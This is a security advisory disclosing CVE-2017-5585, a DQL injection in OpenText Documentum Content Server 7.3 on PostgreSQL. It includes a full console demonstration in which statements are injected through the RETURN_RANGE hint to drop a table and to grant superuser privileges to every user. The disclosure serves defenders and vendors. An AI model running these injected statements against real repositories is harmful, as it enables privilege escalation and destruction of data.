OpenText Documentum Content Server 7.3 SQL Injection
Posted on 18 February 2017
CVE Identifier: CVE-2017-5585 Vendor: OpenText Affected products: OpenText Documentum Content Server 7.3 (PostgreSQL builds only) Researcher: Andrey B. Panfilov Severity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) Fix: not available Description: Previously announced fix for CVE-2014-2520 seems to be incomplete: when PostgreSQL Database is used and return_top_results_row_based config option is set to false, Content Server does not properly restrict DQL hints, which allows remote authenticated users to conduct DQL injection attacks and execute arbitrary DML/DDL statements on the target system via crafted request. Demonstration: ================================================================8<============================================================== Connecting to Server using docbase DCTM_PSQL [DM_SESSION_I_SESSION_START]info: "Session 0102987880002902 started for user dm_bof_registry." Connected to Documentum Server running Release 7.3.0000.0214 Linux64.Postgres -- -- Amount of superusers in Documentum repository -- 1> select count(*) from dm_user where user_privileges=16 2> go count ------------ 1 (1 row affected) -- -- Demonstration or how Content Server translates DQL query to SQL -- 1> select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;drop table dm_user_s;') 2> go [DM_QUERY_E_CURSOR_ERROR]error: "A database error has occurred during the creation of a cursor (' STATE=2BP01, CODE=7, MSG=ERROR: cannot drop table dm_user_s because other objects depend on it; Error while executing the query')." 1> exec get_last_sql 2> go result ------------------------------------------------------------------------------------------- select all CAST(count(*) as int) from dm_user_sp dm_user order by 1;drop table dm_user_s; 1321 Commit 1321 Commit (1 row affected) -- -- Exploitation -- 1> select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;update dm_user_s set user_privileges=16;') 2> go count ------------ 67 (1 row affected) -- -- Amount of superusers in Documentum repository after exploitation -- 1> select count(*) from dm_user where user_privileges=16 2> go count ------------ 67 (1 row affected) 1> ================================================================>8============================================================== Disclosure timeline: 2014.02.22: Vulnerability discovered 2017.01.25: CVE Identifier assigned 2017.02.01: Vendor contacted, no response 2017.02.15: Public disclosure __ Regards, Andrey B. Panfilov